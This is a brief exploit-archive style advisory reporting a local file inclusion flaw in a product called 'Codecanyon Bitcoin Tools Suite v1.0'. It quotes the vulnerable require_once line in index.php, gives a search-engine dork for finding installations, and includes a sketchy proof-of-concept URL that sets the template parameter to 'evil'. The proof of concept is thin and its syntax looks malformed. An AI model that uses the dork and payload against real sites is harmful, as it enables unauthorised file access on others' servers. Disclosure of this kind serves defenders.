Headline
Codecanyon Bitcoin Tools Suite 1.0 Local File Inclusion
Codecanyon Bitcoin Tools Suite version 1.0 suffers from a local file inclusion vulnerability.
========================================================================================================| # Title : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html | | # Dork : "Powerful bitcoin and cryptocurrency tools & tickers." |========================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : index.php line 4 : require_once('includes/templates/' . $website['template'] . '/header.php');[+] http://localhost/btcon/index.php?website['template'] = evilGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================